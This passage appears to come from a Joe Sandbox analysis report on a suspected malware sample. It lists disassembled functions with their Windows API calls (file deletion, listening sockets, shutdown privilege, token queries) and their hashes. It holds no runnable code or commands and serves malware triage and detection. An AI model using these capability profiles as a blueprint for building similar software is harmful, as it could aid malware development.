                                                                          • IIDFromString.OLE32(?,?), ref: 003884E1
                                                                          • VariantInit.OLEAUT32(?), ref: 0038857B
                                                                          • VariantClear.OLEAUT32(?), ref: 003885DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: 24cbeffeebe25c3de5b9c62ad7246569615c62095f3064be05057dc1c559c835
                                                                          • Instruction ID: fd07a94cc29a74ba41903cabc2f894a9e1676bea1b32704bf7e9d9c529151111
                                                                          • Opcode Fuzzy Hash: 24cbeffeebe25c3de5b9c62ad7246569615c62095f3064be05057dc1c559c835
                                                                          • Instruction Fuzzy Hash: 7261A0716083129FC716EF15C848F6AB7E8AF49754F40489EF9869B291CB70EE44CB92
                                                                          Function 00384164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: 18617321573dbce3c97fb9481578ab53ab80a4dc079e00f0ccf687bdc9a64577
                                                                          • Instruction ID: 7f677910c86c4c3e035637b76e29f2fdf2d55bef3a564635cd2bdbf1c3fd31fc
                                                                          • Opcode Fuzzy Hash: 18617321573dbce3c97fb9481578ab53ab80a4dc079e00f0ccf687bdc9a64577
                                                                          • Instruction Fuzzy Hash: 13219C352003119FDB12AF24EC19BAA7BACFF09750F10846BFA46DB2A1DB31AD41CB54
                                                                          Function 003737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                            • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003738A3
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0037394B
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0037395E
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0037397B
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037399D
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003739B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 4002782344-1173974218
                                                                          • Opcode ID: 153166ac12206d626e2f3ac4f2905ca47968866b71fecaaee301fa59372bb743
                                                                          • Instruction ID: 60ba7c1cebd4ce7d3b29df8a342f6fbc6311c02df6cc21bbb9ce14b91fc8dc8d
                                                                          • Opcode Fuzzy Hash: 153166ac12206d626e2f3ac4f2905ca47968866b71fecaaee301fa59372bb743
                                                                          • Instruction Fuzzy Hash: AB51933180514CAACF27EBA0C9929EDB778AF19300F644069F409BB191EF356F4DDB51
                                                                          Function 0037F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0037F440
                                                                          • Sleep.KERNEL32(0000000A), ref: 0037F470
                                                                          • _wcscmp.LIBCMT ref: 0037F484
                                                                          • _wcscmp.LIBCMT ref: 0037F49F
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 0037F53D
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F553
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                          • String ID: *.*
                                                                          • API String ID: 713712311-438819550
                                                                          • Opcode ID: b8b5c0ee9f8838ae96a0bf1435c0974b23ece1ec3f2dc8c4af4461591fb47ebc
                                                                          • Instruction ID: f50f11f33c8c7a75e2008bc3dfcec9440e62d26f1b1d110e8481ea5b879969cd
                                                                          • Opcode Fuzzy Hash: b8b5c0ee9f8838ae96a0bf1435c0974b23ece1ec3f2dc8c4af4461591fb47ebc
                                                                          • Instruction Fuzzy Hash: 9F4171719002199FCF26DF64DC45AEEBBB8FF09324F148466E819A7191EB359E84CF90
                                                                          Function 00323030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __itow__swprintf
                                                                          • String ID: 3c2$_2
                                                                          • API String ID: 674341424-3690450720
                                                                          • Opcode ID: bc95682b9d408ee3ccf832c2e6ab465f92fc30a5b1956d8e9691e2083f57a60f
                                                                          • Instruction ID: 5874b26fdb592db8128a3e1f15f3334cd3c61eff23655979072bdf0d9eb659ac
                                                                          • Opcode Fuzzy Hash: bc95682b9d408ee3ccf832c2e6ab465f92fc30a5b1956d8e9691e2083f57a60f
                                                                          • Instruction Fuzzy Hash: F422B1716083109FC726EF14D892BAFB7E4BF88710F40491DF9969B291DB35EA44CB92
                                                                          Function 00325760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 13dcd57296ae4224d071e478041b29a07f1b719e727966e213940cb8bcd7a53c
                                                                          • Instruction ID: 77df97ebcaff9e0e0e8decd8dc41a6f011b8aabca7b7f50026d5cbadd433730c
                                                                          • Opcode Fuzzy Hash: 13dcd57296ae4224d071e478041b29a07f1b719e727966e213940cb8bcd7a53c
                                                                          • Instruction Fuzzy Hash: 45127D70A00619DFDF0ADFA5D982AEEB7F5FF48300F108569E406EB254EB35AA50CB54
                                                                          Function 00373B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                            • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00373B89
                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00373BD9
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00373BEA
                                                                          • FindClose.KERNEL32(00000000), ref: 00373C01
                                                                          • FindClose.KERNEL32(00000000), ref: 00373C0A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 2649000838-1173974218
                                                                          • Opcode ID: 684a42436a42a1c39e2fe4b5e61f897a40d8a8cbf11211a9563af1e3d4547c00
                                                                          • Instruction ID: b77868956db8c2675fa6e2138c48711da1e893c01b4749cd4664590518f2384f
                                                                          • Opcode Fuzzy Hash: 684a42436a42a1c39e2fe4b5e61f897a40d8a8cbf11211a9563af1e3d4547c00
                                                                          • Instruction Fuzzy Hash: 5D3180350083859FC317EF24C8919EFB7ACAE99304F444D2EF4D996191EB25DA08DBA3
                                                                          Function 003751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
                                                                            • Part of subcall function 003687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
                                                                            • Part of subcall function 003687E1: GetLastError.KERNEL32 ref: 00368865
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003751F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                          • String ID: $@$SeShutdownPrivilege
                                                                          • API String ID: 2234035333-194228
                                                                          • Opcode ID: fd58ceff3ab0afdc7ed30b0c8643a1daa3a2eac1b422b65bdc378f5056a9fc6b
                                                                          • Instruction ID: 7eb488744d7c2c9a09377c5ef9a3e5ed13353ebaf7a92e810416f94b75e0030d
                                                                          • Opcode Fuzzy Hash: fd58ceff3ab0afdc7ed30b0c8643a1daa3a2eac1b422b65bdc378f5056a9fc6b
                                                                          • Instruction Fuzzy Hash: 1901F7317916156BE73F63689C8AFBA725C9B09341F228D25F90FE60D3D9DA5C008590
                                                                          Function 00386283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003862DC
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003862EB
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00386307
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00386316
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00386330
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00386344
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                          • String ID:
                                                                          • API String ID: 1279440585-0
                                                                          • Opcode ID: 88092c47e6ad2c58c25e5af2ffc1d5ec1e2d4fc761c5fcf912b22cb65f0d5bdc
                                                                          • Instruction ID: b4458a06e33088d33d8004943566d8adad52ec00a649c67f5dd21de941a1815c
                                                                          • Opcode Fuzzy Hash: 88092c47e6ad2c58c25e5af2ffc1d5ec1e2d4fc761c5fcf912b22cb65f0d5bdc
                                                                          • Instruction Fuzzy Hash: 7421A2356002049FCB12EF64C846BAEB7ADEF49720F25819AE956EB3A1C770AD41CB51
                                                                          Function 00325520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                          • _memmove.LIBCMT ref: 00360258
                                                                          • _memmove.LIBCMT ref: 0036036D
                                                                          • _memmove.LIBCMT ref: 00360414
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1300846289-0
                                                                          • Opcode ID: e9dc899f7d606fbb6c3be532597f3221df38f7ad80721dd4e0dc29aac9165bdc
                                                                          • Instruction ID: 140beb0696fb7d527af1748522bfef67ff9438739e6d41ff26b4e96114f64b90
                                                                          • Opcode Fuzzy Hash: e9dc899f7d606fbb6c3be532597f3221df38f7ad80721dd4e0dc29aac9165bdc
                                                                          • Instruction Fuzzy Hash: F002B370A00219DBCF0ADF64D992AAE7BF5EF48300F15C069E806DF255EB35EA50CB91
                                                                          Function 00311287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 003119FA
                                                                          • GetSysColor.USER32(0000000F), ref: 00311A4E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00311A61
                                                                            • Part of subcall function 00311290: DefDlgProcW.USER32(?,00000020,?), ref: 003112D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ColorProc$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 3744519093-0
                                                                          • Opcode ID: 9d8c7b8e6ec2aa6a1867fda7a2207d002c263655b9f54c8f40d358bad9aff712
                                                                          • Instruction ID: f040b64cf9a9ceb43818531564657e9d4c19d1540965dab77c1133232ee9d534
                                                                          • Opcode Fuzzy Hash: 9d8c7b8e6ec2aa6a1867fda7a2207d002c263655b9f54c8f40d358bad9aff712
                                                                          • Instruction Fuzzy Hash: 06A14671116544BAEB2FAB289C44EFF799CDF4E381F16011AF702D9592CB21ED8192F1
                                                                          Function 0037BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037BCE6
                                                                          • _wcscmp.LIBCMT ref: 0037BD16
                                                                          • _wcscmp.LIBCMT ref: 0037BD2B
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0037BD3C
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0037BD6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 2387731787-0
                                                                          • Opcode ID: 44667d107c2ffa5e5d41e2d608a97b104e78a15ad8d08736de5b11f07ba859e1
                                                                          • Instruction ID: 1de714ba493d8d0f55fb69c1d05dffb2ffefcd65ad4e00b7d01a0684c3af0768
                                                                          • Opcode Fuzzy Hash: 44667d107c2ffa5e5d41e2d608a97b104e78a15ad8d08736de5b11f07ba859e1
                                                                          • Instruction Fuzzy Hash: F9519E356046019FC72ADF28C490E9AB3F8EF49320F15851DF95A8B3A1DB34ED44CB91
                                                                          Function 00386747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00387D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00387DB6
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0038679E
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003867C7
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00386800
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0038680D
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00386821
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          • Opcode ID: df21d26cf0bd7338fded92cdaa7d6f2338757590a5b3375e84d7ec9bf1710b16
                                                                          • Instruction ID: c94bfbeac3b582ac96aaf2271867753b2ca181ada0674727d20f27dcb0b2cb70
                                                                          • Opcode Fuzzy Hash: df21d26cf0bd7338fded92cdaa7d6f2338757590a5b3375e84d7ec9bf1710b16
                                                                          • Instruction Fuzzy Hash: 4F41BF75A00300AFEB16BF648C97FAE77E89F09714F048459FA1AAF3D2CA709D418791
                                                                          Function 00395376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: ef9342fbff4cc930056ea8dc7485ba5a57f28b2878208cb2c2615cdc97a1f968
                                                                          • Instruction ID: 434f765c0f55ea65b9db75f7434bae3bc4633d6208e0f3fc1d25f6a43b82a923
                                                                          • Opcode Fuzzy Hash: ef9342fbff4cc930056ea8dc7485ba5a57f28b2878208cb2c2615cdc97a1f968
                                                                          • Instruction Fuzzy Hash: 3011B2323009116FEF235F269C84B6ABB9CEF457A1F514029F846D7241CBB09C8187A4
                                                                          Function 003680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003680C0
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003680CA
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003680D9
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003680E0
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003680F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 106bff17d088ca635d66bdc047ced83a6bcce55f0854746e33b43a477bcf4eeb
                                                                          • Instruction ID: cc1e2cc18e12a2f1a6d65a12d0d81ba5c354a644d7118577f7d86aa301ceaeec
                                                                          • Opcode Fuzzy Hash: 106bff17d088ca635d66bdc047ced83a6bcce55f0854746e33b43a477bcf4eeb
                                                                          • Instruction Fuzzy Hash: CCF06235240204BFEB121FA5EC8DE6B3BACEF4A755F104126F945C6150CF62DC42DA60
                                                                          Function 00314B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00314AD0), ref: 00314B45
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00314B57
                                                                          Strings
                                                                          Memory Dump Source
